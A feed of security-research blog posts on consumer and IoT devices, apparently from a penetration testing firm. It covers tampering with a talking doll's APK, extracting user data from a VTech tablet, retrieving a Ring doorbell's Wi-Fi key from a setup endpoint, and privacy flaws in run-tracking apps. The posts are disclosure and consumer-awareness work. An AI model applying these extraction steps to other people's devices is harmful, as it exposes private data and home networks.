Quantcast
Channel: Android – Pen Test Partners
Viewing all 21 articles
Browse latest View live

Some simple security advice for computer and smartphone users

$
0
0

Advice2

After a recent TV show in which I demonstrated how easy it can be to compromise users computers and ‘steal’ very personal video and photos, here’s some really simple advice to help prevent this happening. There are plenty of other resources online that have more information: https://www.getsafeonline.org is a good place to start.

Passwords – if you can honestly say that you never use the same password anywhere, then ignore this advice. If not, then go download a free password manager tool. They take away nearly all the pain of creating, remembering and managing your passwords for you. Big names in the field include LastPass, KeePass, RoboForm, Dashlane, 1Password among many.

Passwords are stolen in data breaches all the time. If you re-use passwords, then your accounts on unrelated web sites will be hacked. If you’ve ever had a weird email from a friend’s Gmail or Yahoo account, that’s likely to be what has happened – they re-used a password which was then stolen elsewhere. Then their web mail got hacked.

Be cynical – don’t believe ‘Microsoft’ phone calls or phishing mails. If you’re concerned, hang up the phone, then dial the organisation from another phone. Make sure the phone number is legitimate by checking the organisation’s web site.

Phishing – Office documents are a great way to compromise your computer. Never enable macros by clicking ‘enable content’ in an Office document, unless you’re certain the document is legitimate.

This is what the alert looks like:

Advice

Don’t click ‘enable content’ unless you are certain the document is safe and legitimate.

Set a decent PIN on your smartphone & tablet, even if you use fingerprint unlock on it. 6 digits is an absolute minimum, ideally 8. In some cases, a 4 digit PIN can be cracked in seconds.

Run good anti-virus software, and pay for a subscription from a brand name that you recognise. The security ‘suite’ you get with a subscription can help prevent you being infected in many other ways. It’s also a good idea to run some anti-malware software from time to time. I quite like Malwarebytes.

Anti-virus is also essential on Apple desktops too, particularly so if you run Office on your Mac.

Sandboxie – you’re likely to be compromised from one of two routes; email or web browsing. Sandboxie is a free tool that protects your web browser in Windows. It effectively wraps your web browser in another layer of security. If you pick up some malware when web browsing, all you have to do it close your web browser, re-open it and you get a nice, clean uninfected web browser. So easy!

Keep everything up to date. Every time your phone or your computer flags an update to you, what the software provider is really saying is ‘we made a mistake, there’s a security flaw in the version of our software that you’ve got. Here’s a fix’.

Unfortunately, updates are usually dressed up as functionality improvements by the vendor – hence consumers often don’t bother to apply them. Don’t update at your peril.


New, easier ways to make My Friend Cayla swear

$
0
0

actually
As you may know we have done a lot of research on My Friend Cayla in a puerile attempt to get her to swear.

We looked at her database of questions and “badwords”, we edited them and eventually got her to swear.

Then ToyQuest updated the app and added SQLcipher encryption to make it harder to access the database, but we managed to bypass that as they had to include the key for the encryption in plain text in the app!

Tim’s research

A couple of days ago I saw a tweet from a guy called @timmedin who has done some excellent research. His novel work was on iOS. We have applied and verified it on Android.

Our original research uncovered that the swearing filters weren’t applied from the local SQLlite db ‘talking’ content, and the filter words themselves could also be removed. Tim found a route to prevent the filters from being applied to talking content retrieved from Wikipedia.

He showed how you can filter the Wikipedia lookups to effectively block her badword filter and get her to read “inappropriate” content from Wikipedia. He mentioned how he could have rewritten one of Cayla’s stories on his jailbroken devices to make her say arbitrary things. It got me thinking, we use Cayla a lot in our live hack demos and sometimes struggle to get her to actually speak, let alone swear.

What if we could actually get her to speak a segment of our presentation, complete with expletives?

I started by looking at the name field. Sure you can set an arbitrary name in the text you want her to say, but the bad word filter still applies and there is a limit. No luck there, but useful for on the fly things.

actually11

Then I thought why don’t we try and edit her stories and upload that. The stories come bundled with the app and are preprepared so that Cayla will read them out for your child to listen to.

actually22

Here’s the how-to

This technique is trivially easy, even for a novice Android attacker.

I downloaded the latest app from the Play store and on my rooted tablet connected with ADB and pulled the APK from /data/app:

C:\Android\sdk\platform-tools > adb pull /data/app/com.toyquest.Cayla.en_uk-1.apk

With this in hand I set about finding out how the stories are generated. You can open an APK with 7-zip. The stories are stored in \assets\language\en.lproj\story.strings:

actually3

Extract the file and open it with notepad++ and you can edit it to hearts content:

actually4

This will change the content of the story, but not the actual displayed text within the app!

actually5

Once you are happy save the file and add it back to the APK (using 7-zip).

Then you need to upload it back to your device using:

C:\Android\sdk\platform-tools>adb push com.toyquest.Cayla.en_uk-1.apk
/sdcard/com.toyquest.Cayla.en_uk-1.apk

Note: You can’t copy directly to the /data/app folder. You need to copy it to the sdcard folder and then use adb shell as root to copy it to the app folder:

C:\ Android\sdk\platform-tools>adb shell
shell@ac79bu:/ $ su
root@ac79bu:/ # cp /sdcard/com.toyquest.Cayla.en_uk-1.apk /data/app/com.toyquest.Cayla.en_uk-1.apk

If you had the app open make sure you restart it.

Then when you go to the story Cayla will read exactly what you have written, including any swear words!

Next steps

Get two dolls to have a conversation, better still get Cayla to turn on a Samsung TV with “Hi TV” and then change the channel to the adult channel…

VTech Innotab Max vulnerable to trivial data extraction

$
0
0

Just when you thought it couldn’t get much worse for VTech toys after the recent breach, we found two easy ways to pull the data from their kids Innotab tablet.

In the case of a lost, stolen or re-sold tablet, any and all data that the child or adult has put on there is exposed. Passwords, PINs, email addresses, app data, you name it.

We started by pulling the back off the tablet to see what we could find.

CPU

…and there’s our old friend the RockChip CPU. The model number printing isn’t perfectly legible but it looks to be a RK3188 unit. Just in case you missed it from our older posts then the issue is as follows:

Most devices need a mode in order to recover from a bricked state, say where an update went wrong. This is fine, one would be expected to be able to WRITE new firmware to it in this state.

However, the RockChip allows data to be READ in this mode too. That’s a huge fail.

So, plug in a USB cable, hold down cursor left, cursor up and hold down the power button for 3 secs, and you enter flash mode. You’ll need the the rkflashtool
to read memory, but here’s are the parameters you’ll retrieve:

FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_mult
i_card=0 board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/
init initrd=0x62000000,0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc
),0x00006000@0x00004000(kernel),0x00006000@0x0000a000(boot),0x00010000@0x0001000
0(recovery),0x00020000@0x00020000(backup),0x00040000@0x00040000(cache),0x0000200
0@0x00080000(kpanic),0x00004000@0x00082000(app),0x00300000@0x00086000(system),0x
00100000@0x00386000(data),-@0x00486000(userdata)

Lots of lovely data in there – the Android version of 4.1.1, which isn’t great. Also the address at the start of the user data partition (0x00486000).

Simply dump the data partition (will take an hour or so), mount and off you go with someone else’s data.

This bug has been known about for well over 2 years. It’s a bit lame of VTech to continue shipping vulnerable tablets, tablets that expose children’s data…

But that’s not all!

There’s a microSD card on the motherboard. It was glued on, but that took seconds to prise off.

vtech-SDcard

A quick read shows that it’s the filesystem and user data. Yes, really. On a removable SD card. Other than making for another easy route to extract sensitive data, that’s also asking for reliability trouble down the line.

There’s several GB of data on there, we haven’t had time to analyse it yet, but here’s a hexdump to prove the point.

vtech-hexdump

And to wrap up, another bug to boot

ADB enabled by default. Looks like we’re root too.

vtechadb

Verdict? VTech could do a LOT better with the security of their hardware that stores our children’s data.

VTech Innotab Max: it’s getting even worse! Apps run in debug mode

$
0
0

After extracting an image from an Innotab last night using the methods we blogged about yesterday, we mounted it and had a look.

Here’s the /data directory mounted on a Linux VM

vtechdatadir

Looking at the system/packages list and things get a whole lot scarier

The format below is:

package       UID       debugflag       path

vtechsystem

As you can see highlighted, virtually all the com.vtech.* apps have the debugflag enabled.

This means that with an ADB connection you don’t actually need root to read their sandbox or manipulate them.

We covered the significance of this a while back here:
https://www.pentestpartners.com/blog/android-debug-mode-and-apps-a-cautionary-tale/

What will we find next??

Vtech Innotab Max file extraction: Finding the Superblock

$
0
0

After the VTech hack, we thought we’d have a look at the security of some of their devices, just to see what we could find and whether I would even think about giving one to my kids.

So after further messing around with our online shopping recommendations, we ordered some of their devices. Ken took the back off one, discovered that the CPU was our old friend RockChip and that for some reason it used a micro-SD card to store its data.

I have taken apart a lot of tablets, both hi-spec ones designed for game playing and cheap ones designed for children to use. I have never seen an SD card being used to store the OS. This makes it very easy to extract the contents of the device’s memory and tear it apart offline. You can even do this with five minutes of alone time with the tablet.

I’m going to explain how we can do about doing this.

The first step is the easiest: Image the device. This is best done from Linux through a card reader and can be performed by using the dd command to directly copy from the block device for the card reader to a file.

We then end up with an 8 GB binary data file. How do we process this? Those of you that have read my previous posts are probably thinking “binwalk”. Usually, yes, but not this time. You can binwalk it, but you will get a lot of false positives and false leads. We’re going to be sneakier.

Now we know that the device is:

  1. Running Android
  2. Is based on the Rockchip CPU

This gives us an idea of some common partitions (cache, system, data) and how the bootloader work (using a parameter block which defines the partitions when passed to the Linux kernel).

So, as a sanity check and to help us out later, we can use the strings command – the command will return anything that looks like a NUL terminated string and search for the parameter block:

 [dave@jotunheim tmp]$ strings innotab.img | less
/PARM
FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_multi_card=0 
board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/init initrd=0x62000000,
0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),
0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),
0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),
0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)

Got it! This tells us that there isn’t anything funny going on with the image, it is where the boot media is stored and the locations of the partitions (well, the locations with an offset that the boot loader knows about):

mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),
0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),
0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),
0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)

So those numbers are all the offsets in hexadecimal that the partitions are placed at. The offsets are in blocks, so we need to multiple each number by 512 (0x200 hex). The format is <length > @ <offset> (name).

We can sort this by offset and translate from blocks to bytes:

vtechhex

Unfortunately we need to know the offset of the boot in the image. We could work this out from the parameter block, but the Internet doesn’t provide much information about these at all. There’s one more thing we can try.

We can try looking for known data and track it back to the start of the partition. Then we can assume the offset is consistent.

As the device is Android over version 4.0 we know that at the very least the cache, system and userdata partitions with be using the ext2 or later file systems. This gives us an avenue of attack: we can loop through the image and search for things that look like an ext2 file system.

This isn’t immediately easy: we have an 8 GB image and 3 – 4 different files systems in there, so how can we find at least one so that we start finding the other filesystems?

Ext2 (and later) file systems have something called the superblock that is a block at a specified place in the file system that is used to define the parameters for the file system. This superblock is replicated through the file system as a safety measure in case the original one gets corrupted.

We can easily find the format for the superblock thanks to the wonders of open source. From this we know it is placed 1024 bytes (0x400) from the start of the filesystem and the rough structure.

The superblock has a magic number – a number which should identify the data – of 0xEF53 (you can read that as EFS 3 if you want), but a quick experimentation showed me that that would produce a lot of false positives, so I needed slightly more to minimise this.

Upon a bit of delving, the structure has some fields, s_state, s_errors and s_creator_os, that are guaranteed to be small. So if we find a block of data with the magic number in the right place and the above fields less than a certain value we’re pretty certain we have a superblock. In C, this would be:

 if (superblock.s_magic == 0xef53 &&
          superblock.s_state < 3 &&
          superblock.s_errors < 4 &&
          superblock.s_creator_os < 5) 

So I wrote a quick bit of C, which I’ve uploaded to our github. Note, this is quite hacky and inefficient C and I wouldn’t use it in anger.

Compiling and running this (and waiting for a while) found a number of potential superblocks, most of them were duplicates (remember that bit I said earlier about superblocks being spread throughout the filesystem for a backup):

 [dave@jotunheim tmp]$ ./findsblock
Possible superblock at 8400400: /cache
Possible superblock at 8414400: /cache
Possible superblock at 841f400: /cache
Possible superblock at 8425400: /cache
Possible superblock at 882e400: /cache
Possible superblock at 8833400: /cache
Possible superblock at 883b400: /cache
Possible superblock at 884a400: /cache
Possible superblock at 11000400: /system
Possible superblock at 19001000: 
Possible superblock at 29001000: 
Possible superblock at 39001000: 
Possible superblock at 411a0400: /system
[...]

And there was more, but we already have enough now. Let’s look at the first finding: /cache at 0x8400400, which is the start of the superblock, which means the file system starts at 0x8400000. Looking to the table above, we can see that according to the parameter block, the cache partition should start at 0x08000000, which means that the offset is:

 0x08400000 - 0x08000000 = 0x00400000 

Or in reality, it just means that we can add 0x00400000 to every file offset to find it. So this means that the userdata partition is at 0x90C00000 in the parameters file, so it must be at:

 0x90C00000 + 0x00400000 = 0x91000000 

…in the image file. So we can extract it. The quickest way to do this is to use the old faithful dd command, using something like:

 dd if=innotab.img of=innotab-userdata.img bs=1 skip=$((0x91000000)) 

But this would take about 8 hours to work as we setting it to use a blocksize of 1 byte – doing it would read the file in one byte at a time and then write it out to the destination one byte at a time.

We can speed this up, by increasing the blocksize by using bash expressions, inside a $(( )) brackets. If we make the blocksize a multiple of the offset, then we don’t need to mess around here. My virtual machine only has 1 GB of memory so I can’t make the blocksize the whole offset, but if I divide it by 4 and then skip 4 blocks it will all magically work out:

 [dave@jotunheim tmp]$ time dd if=innotab.img of=innotab-userdata.img bs=$((0x91000000 / 4)) 
skip=4 9+1 records in 9+1 records out 5636096000 bytes (5.6 GB) copied, 421.829 s, 13.4 MB/s real 7m2.643s user 0m0.004s sys 0m25.575s

Now we can just mount this volume on a convenient mount point and we can access the userdata partition, which will contain all changeable aspects of the device, including the accounts database, the wireless configuration and the apps’ sandboxes!

 [dave@jotunheim tmp]$ ls /mnt/userdata
app          cameraKeyStatus.txt  gsensorcal          nandCartridgeStatus.txt
app-asec     dalvik-cache         local               property
app-lib      data                 lost+found          resource-cache
app-private  dontpanic            media               ssh
backup       drm                  media_profiles.xml  system
bluetooth    gps                  misc                user 

Why buying a smart toy for a child might be the craziest thing you could do

$
0
0

smarttoy

There are 15 days until Christmas so there’s still plenty of time to be rummaging around looking for presents and having them delivered. Enough time to actually think about what you’re buying for your nearest and dearest, I’ll still fail at some point though and end up sending the hollowest of gifts: vouchers.

What I won’t be doing, now or possibly ever, is buying anyone important to me a “smart” toy.

Smart toy consumer advice

The main reason I dislike smart toys is that as a general rule of thumb their security is terrible. While manufacturers speak of the play benefits of tablets and talking dolls, in our experience they have a great deal to learn about how to protect your child’s safety and privacy. You would think that a toy marketed as ‘kid safe’ or ‘safe and secure’ would have security nailed. In most cases, it seems not!

If you’re thinking of giving a smart toy at Christmas, or any other time of year, here’s some advice that may be helpful to you in making the right choices.

Think about the data

A defining feature of smart toys is that they are usually connected to the internet via an app or Wi-Fi. This means that there is information flowing between the toy, smartphone/tablet and the manufacturer. In itself this isn’t a worry, smart toys harvest data in order to function, it’s what makes them “smart”.

What is a worry is how that data is handled. Does it use a secure channel? Is it encrypted? Are the manufacturer’s systems where your child’s data is stored robust enough to withstand being hacked? Here’s a three word answer: VTech database breach.

The manufacturers of the InnoTab Max kids tablet insufficiently protected themselves, which allowed hackers to access and steal data which was gathered from tablets via their app. While they said that no credit card or banking information was compromised they couldn’t say the same for 6.4 million children’s names, genders, and dates of birth, as well as postal and email addresses. According to the BBC there is evidence that photographs and chat session logs were also compromised.

Unlike your credit card and banking details, you can’t change your kid’s personal information once that’s in the public domain.

Whilst many manufacturers have provided assurance that they won’t use data collected from children for marketing purposes, that care doesn’t apply to the hacker that has stolen the data! Still, the potential for manufacturers to send carefully worded messages direct to children through their toys must be very tempting.

For example, when My Friend Cayla is asked ‘What is Toys R Us’ she says:
“Toys R Us shops are really big and all they sell is toys and fun things…”

A bit creepy, don’t you think?

Think about the device/toy

In the last year alone we have conducted research on dozens of tablets and many smart dolls and toys. Without exception every single one showed security flaws to some degree. Some were so bad that a hacker could hijack the toy and communicate directly with a child whilst playing. The hacker could snoop on conversations in the house using the toy, or even worse, talk to your child through the toy.

What can you do?

If you want your children to play safely the internet generally isn’t the ideal playground, however there are some tips that will minimise risk:

  • Talking/listening dolls/bears etc. are plain creepy. Given that a hacker may be able subvert them to communicate directly with your child you should steer clear. This
    recent piece of news makes that point perfectly.
  • Don’t buy child-specific tablets. They are cheap for a reason. Security often costs a little extra.
  • If you do want to give a child a tablet as a gift, get a recent model from a known brand and keep the software up to date. Set and use parental control features.

Up to date Android and Apple tablets are pretty secure, particularly if you spend a few minutes setting them up securely. There’s plenty of good advice about that online.

OWASP Birmingham IoT Hackathon

$
0
0

If you came to the OWASP Brum chapter meeting last night, it was great to see you. If you didn’t here’s what you missed…

Ken (@TheKenMunroShow) opened with some background on the research we’ve done to date and Dave (@tautology0) delivered a primer on hardware hacking and reverse engineering with the dubious help of a Furby, to help get everyone up to speed.

OWASPBrumIoTcomp

Credit: @sneakymonk3y

The kit we brought along for breaking researching was:

  • Smarter iKettles 1 and 2
  • Smarter Coffee machines
  • FitBit Aria scales
  • Hoover Wizard smart oven
  • Sphero BB-8
  • Hello Barbie
  • My Friend Freddy Bear
  • My Friend Cayla

Yes, fun was had, as well as making more progress with the iKettle 2.0.

***It looks like we may have a method for a super-heated drive-by iKettle attack. Watch this space.***

OWASPBrumIoTscalesguts

OWASPBrumIoTscales

OWASPBrumIoTkettle

OWASPBrumIoT

Star Wars BB-8 IoT toy: awesome fun, but can it be turned to the Dark Side with this vulnerability?

$
0
0

BB-8pic

Like all Star Wars fans, we are all over the merchandise. Hence, when we saw the amazing BB-8 IoT toy from Sphero, we HAD to have one.

It was of course purely for security research, but we had to have a play with it first. We were very impressed. The mobile app is very slick, the toy itself is very cute with some lovely functionality. Very appealing to those who love Star Wars. Watching it go out on ‘patrol’ and explore the office had us all laughing.

There’s a promotional video here
and it pretty much lives up to expectations set in the video.

Yes, it’s expensive at over £100 but I would say worth it.

HOWEVER

I spent a few minutes poking around the Android app that controls the BB-8. It talks to the droid over Bluetooth. There’s no PIN security in the pairing process, but I haven’t got round to investigating whether there’s anything that can be done there.

Various sources have indicated that around 15% or more of all Android apps in the Play store have issues with unprotected communication over the internet. That certainly correlates with our findings when testing Android apps.

So I spent some time rummaging around and MITM’d the wireless connection.

And here’s what I found. If you force a firmware update, it goes over HTTP. No SSL. Fail!

Evidence of this can be found by wiresharking the connection. It points at http://update.orbotix.com/sphero/current/ and constructs a request for the correct firmware.

For example: http://update.orbotix.com/sphero/current/SpheroM4Mix-3.73.bin

This is further revealed in the code in com.orbotix.fimware.e.class, here we can see it constructing the request:

BB-8code

We put this privately to Sphero, who were very responsive & acknowledged the bug. Props to Sphero!

SSL is being implemented currently, though a timeline hasn’t been shared with us.

What could you do with this?

Frankly, not a lot right now. That’s why I’m talking about it in public before an update has been published. There doesn’t appear to be any personal data on the mobile app or the droid. There are no particularly useful sensors on it either, so it’s not like it could be used for spying on the user.

There would have to be a near perfect storm in order to exploit this usefully: If there was a current vulnerability in the Android (or iOS) Bluetooth stack (we’re not aware of one) and the victim has a BB-8 and they do a firmware update whilst an attacker is in the locale then something could be compromised.

What next?

We want to have a look at the firmware to see what’s in there. Binwalk wasn’t immediately forthcoming with useful stuff, so more time needs spent there.

Popping rogue firmware on to the BB-8 would be interesting, particularly if we find functionality on there that would be of use. Could we make it do some silly stuff, like head for the hills at high speed? Could we turn it to the DARK SIDE?

Quick analysis of the protocol by my colleague Dave was interesting; it’s a simple binary protocol:

e.g

ROTATION_RATE = new RobotCommandId(“ROTATION_RATE”, 3, 3);

So it might be fun to write our own client for it and also fuzz it to see if there’s any undocumented functionality.

It would also be fairly trivial to change the sound files on the app to make it say stuff to the user. I’ll bet we could make BB-8 swear too.

The Bluetooth implementation also needs looking at. No pairing security isn’t an issue for BB-8 in its current guise, but if new functionality emerges in future…

We also really want to have a look at the new wrist controller or ‘Force Band’ for the BB-8 announced at CES this week. Another cool toy!

Conclusion

WE LOVE BB-8. Great toy Sphero!

But, Sphero could do a little better and implement SSL for their firmware updates. That this simple bug was missed suggests that security assurance could be more thorough. Maybe they accepted the risk, given it isn’t a show-stopping vulnerability.

Though, they did a great job of acknowledging the bug and have a plan to get it fixed. A cool vendor.


Steal your Wi-Fi key from your doorbell? IoT WTF!

$
0
0

The Ring is a Wi-Fi doorbell that connects to your home Wi-Fi. It’s a really cool device that allows you to answer callers from your mobile phone, even when you’re not home.

It’s one of the few IoT devices we’ve looked at that we might even use ourselves. It acts as a CCTV camera, automatically activating if people come close to your home. You can talk to them, to delivery couriers, to visitors etc. It can even hook up to some smart door locks, so you can let guests in to your home.

It is genuinely useful! Unlike most IoT devices :-)

ringPacking

BUT

To set it up, one has to connect it to your home Wi-Fi router. That requires that you give it your Wi-Fi key. Here’s where the problem lies.

First some analysis of the hardware.

The major component is the doorbell itself, which is comprised of the necessary circuitry, a li-ion battery, a USB charging port for the battery and a set up button. This is connected to a back plate which attaches the doorbell to the wall and can provide power from an AC source.

ringInternal

Once set up, you fix it to the outside of your house. It’s secured with two Torx T4 screws.

ringScrews

…which means it is extremely vulnerable to theft. Indeed, Ring offer a free replacement if stolen.

The attack, stealing the Wi-Fi key

Take off the door mounting, flip it over and press the orange ‘set up’ button.

ringBack

Pressing the setup button sets the doorbell’s wireless module (a Gainspan wireless unit) into AP mode. This might sound very familiar if you read our post about the Fitbit Aria scales vulnerability.

An access point is created with this format:

Ring-1ea7a2

…where the last three octets are the end of the MAC address. Simply connect to it.

From here the Gainspan’s HTTP server can be connected-to, to talk directly to the wireless module via a REST style API.

ringGainspaninternal

If the URL /gainspan/system/config/network is requested from the web server running on the Gainspan unit, the wireless configuration is returned including the configured SSID and PSK in cleartext.

The doorbell is only secured to its back plate by two standard screws. This means that it is possible for an attacker to gain access to the homeowner’s wireless network by unscrewing the Ring, pressing the setup button and accessing the configuration URL.

As it is just a simple URL this can be performed quite easily from a mobile device such as a phone and could be performed without any visible form of tampering to the unit.

An example:

ringPSK

This is quite a fail: walk up to door, remove doorbell, retrieve users Wi-Fi key, own their network!

  1. Did Ring ever intend to expose this functionality, or was is this just default functionality that Gainspan have in their firmware? As it’s a standard Gainspan URL it looks like they just hadn’t disabled the configuration.
  2. The Wi-Fi key is still stored in the doorbell somewhere – how well protected is it now? It’s most likely stored in the module, somebody with a soldering iron could possibly get it.
  3. Having physical access to the doorbell means we might be able to upload modified firmware. Your doorbell becomes a back door?

HOWEVER

Kudos is due to Ring for responding to our vulnerability alert within a matter of minutes. A firmware update was released earlier this week that fixes this issue, just two weeks after we disclosed it to them privately. Good job Ring!

Who is tracking your run? Run and bike activity tracking app privacy issues investigated

$
0
0

(Cowritten with James Mace).

runchase

Plenty of security vulnerabilities have been found in fitness tracking devices, but we wanted to have a look at the mobile apps that are used for run and bike tracking. Strap your phone to your arm and go out for a run or bike or horse ride. The results were quite shocking.

We found that most of the popular apps we looked at paid scant regard to users security. Default settings encouraged users to over-share personal data. One app had a security flaw that allow private runs to be viewed in real time, so the victim could be tracked.

We looked at this because with these tracking we’re not talking about the risk to a device, or to personal information being harvested, or passwords being stolen. We’re talking about genuine risk to personal safety if that information got into the wrong hands.

Real-time stalking anyone?

Briefly, Nike+ was good. Strava was OK, MapMyRun and RunKeeper were below par and RunTastic had a scary security flaw (now fixed).

What’s at risk?

YOU ARE.

If it’s trivial for anyone to access app data via the website mothership, to target a person and identify exactly where they are (or are going to be) then we have a serious problem on our hands. Of course the availability of that information depends on how a user has configured their app, but as we know many people don’t change default settings. We also know that manufacturers often fail at flagging the importance of changing these settings, and sometimes they don’t provide them at all.

The apps use your phone’s GPS and accelerometers. The information provided is common across all tracking apps. Location, distance, speed, time and elevation are all logged.

Here’s one of us out for a run. During the run, one could watch the runner moving in real time:

runmapping

In isolation this is fairly harmless information. Athletes have been monitoring this stuff for years, latterly with sports watches. The difference with today is that the information stayed in the watch, it wasn’t sent wirelessly or recorded automatically elsewhere as it is now.

Apps under scrutiny

Bearing all that in mind we thought a security review of the main apps was long overdue. We looked at some of the most popular iOS, Android, Windows Phone, and BlackBerry apps and compared their features and associated security risks. The chosen apps were:

  • MapMyRun
  • Nike+
  • Runkeeper
  • Runtastic
  • Strava

We limited our investigations to the information sent to and from our phone apps as a regular user. We didn’t reverse engineer the apps or analyse anything server-side.

High level issues

The biggest and most worrying flaw we found was in Runtastic. We discovered that even with its privacy settings enabled and correctly configured it still allowed the tracking of users in real-time. Thankfully that has since been fixed.

MapMyRun, RunKeeper and Runtastic are all guilty of not explicitly encouraging users to protect their data by configuring privacy settings. Yes, the settings are available, but they are not properly signposted, nor are they enabled by default.

Strava was a better – whilst their default settings led to over-sharing, they emailed the user the following day with privacy advice.

The only app to run with default privacy settings enabled was Nike+. This means that if you have MapMyRun, RunKeeper, Runtastic or Strava the onus is on you to set it up. Not an ideal scenario by any means.

Let’s look at the apps…

With each of the five apps we reviewed these eight criteria:

1. Default privacy settings
How is user data protected by the app by default once downloaded. Is your data and/or activity open to others, or does the vendor make it private as standard?

2. Easily tailored privacy settings?
Is it easy and obvious to change the defaults and make your data more secure, or is it buried in layers of configuration.

3. Is your data transmitted securely (SSL)
Is the data sent between the app and website encrypted?

4. Password strength
Does the app make you set a strong password, or is a password of ‘password’ possible? If weak passwords are allowed, it’s almost as bad as publishing everything about you on the public internet!

5. Predictable Session number (iterative/sequential)?
This looks at the website URLs to see if your activity sessions share similar numbers e.g.
run #1 has website.com/session/123,
run #2 has website.com/session/124,
run #3 has website.com/session/125 etc.
…using sequential sessions isn’t a great idea, as it makes guessing URLs incredibly easy.

6. Can Google Index your runs?
Are the website’s session URLs left open to search engine spiders, making them easier to find? This makes your personal data easier to find on the public internet.

7. EXIF data on uploaded images?
People upload photos of themselves and their runs. EXIF data in images gives unique identifying factors, sometimes including the GPS coordinates where they were taken and more.

8. Live Tracking Capability?
With nothing more than a little knowledge of the app, can the victim/user be followed in real-time?

Findings

Default privacy settings comments MapMyRun

Fully Public: Maps are visible to everyone by default.

Can edit privacy settings via a tiny drop down box on activity feed.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Nike+

Private: Maps only visible to ‘friends’ by default.

Link to privacy policy on main sign-up (in the small text at the bottom) form but no personal data awareness given.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Runkeeper

Private: Maps only visible to ‘friends’ by default.

Though defaults to sharing to social platforms including Facebook and Twitter.

When workout is complete, users have to use slider to indicate which platform they would like to share to.

Link to privacy policy on main sign-up form but no personal data awareness given.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Runtastic

Private: Maps only visible to ‘friends’ by default.

Can see notes and pictures unauthenticated though. – See Live track for vulnerability.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Strava

Fully Public: Maps visible to ‘everyone’ by default.

Have to select checkbox to restrict sharing of workout to private only. Requires this user interaction.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Easily tailored privacy settings? MapMyRun

No

Nike+

Yes

Runkeeper

No

Runtastic

No

Strava

Yes – added extra with ability to set privacy zones to hide your home/work address

Is your data transmitted securely (SSL) MapMyRun

Yes

Nike+

Yes

Runkeeper

Yes

Runtastic

Yes

Strava

Yes

Password strength MapMyRun

Allowed password of ‘password’

Nike+

Allowed password of ‘Password1’ – states password requirements

Runkeeper

Allowed password of ‘password’

Runtastic

Allowed password of ‘password’

Strava

Allowed password of ‘password’

Predictable Session number (iterative/sequential)? MapMyRun

Yes

Nike+

No

Runkeeper

Yes

Runtastic

Yes

Strava

Yes

Can Google Index your runs? MapMyRun

Yes: Example

Nike+

Yes – if workout is shared to social media platforms – requires user to select this – not default.
Example

Runkeeper

Yes – if map is made visible to everyone – requires user to select this.
Example

Runtastic

Yes: Example

Strava

Yes: Example

EXIF Data on uploaded images? MapMyRun

No sensitive information leaked.
Image can be viewed unauth:
Example

Nike+

Image not directly uploaded to Nike+ website. Can be shared to social media – potential for tampering – can’t trust test.

Runkeeper

No sensitive information leaked.
Image can be viewed unauth:
Example

Runtastic

No sensitive information leaked.
Image can be viewed unauth:
Example

Strava

No sensitive information leaked.
Image can be viewed unauth:
Example

Live Tracking Capability? MapMyRun

Only on the paid version. You have to manually enable live tracking and only friends can view it. Can only see ‘local’ friends who are conducting live workouts through the mobile app. We tried a MTM attack on the app to see if we could extract a session identifier for the workout, but application implements SSL pinning and JB detection.

Nike+

Application doesn’t currently support live tracking, just the ability to share routes afterwards etc.

Runkeeper

Default permissions do not allow unauthenticated viewing of live maps. Have to be friends.

Runtastic

Free version supported. Live tracking enabled by default.
Vulnerability found: The live map is not secured when workout is in progress, only after the workout is completed. Issue now fixed.

Strava

Application doesn’t currently support live tracking. It seems the session number is generated when a workout is finished/completed. No way to currently track during workout.

Conclusion

App manufacturers want you to share your data with other users, that’s half the reason the app exists. It’s not surprising then that the apps tend to have very open permissions or they are buried away. What is surprising is that associated web pages are crawlable by search engine spiders. When a user completes their workout each session is tagged with an identifier, and in many cases we inferred this identifier to be predictable due to the use of a sequential/iterative system.

In our research we used Google to find users and their historic workout data, as well as live workout information, all conveniently plotted on an interactive map. We’re unsure if end users were aware that they were sharing their live location with the world. Given the fact most users appear to use a real name and profile pictures, you can see how easy it would be for an attacker to build a thorough profile and location of a target.

We also know that the apps do not force users to create complex passwords. If you want to add an extra layer of protection make sure you use a complex password even when the app does not require it. Use a long password and make sure you pad it using uppercase, numbers and non-alphanumeric characters as well.

Our concerns don’t end there though; the way people are using the apps is a personal safety issue. By browsing users and reading their message threads we found lots of examples of people looking for running buddies. No problem there, except that if these were dating websites people would be meeting first in a public place, not half way up a hill in the middle of nowhere.

Security flaw with Runtastic

When tracking a live run, privacy settings were not correctly applied to the activity. This meant that one could simply iterate through live sessions and track Runtastic users in real time. We tracked each other out on runs many times. It would be trivial to stalk a runner in real time.

